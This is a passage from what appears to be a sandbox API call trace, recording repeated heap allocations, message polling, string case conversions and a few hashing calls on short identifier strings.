Flags=0x0, Size=0x4) returned 0x24b1908 [0248.261] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0248.261] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.261] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0248.261] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.261] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.261] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.262] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0248.262] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.263] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0248.263] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.263] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0248.263] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.263] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.263] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0248.263] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.264] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.264] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0248.264] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.265] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0248.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.265] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0248.265] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.265] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.265] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0248.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0248.266] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.266] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.266] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.266] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.266] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.266] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0248.267] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.267] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0248.267] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.267] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0248.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0248.268] CryptCreateHash (in: hProv=0xad2830, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0248.268] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0248.270] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0248.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.271] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0248.271] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0248.271] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0248.271] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.271] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0248.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0248.272] CryptHashData (hHash=0xaa5760, pbData=0x24b1698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0248.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0248.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0248.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0248.273] RtlAllocateHeap (HeapHandle=0x25c0000, 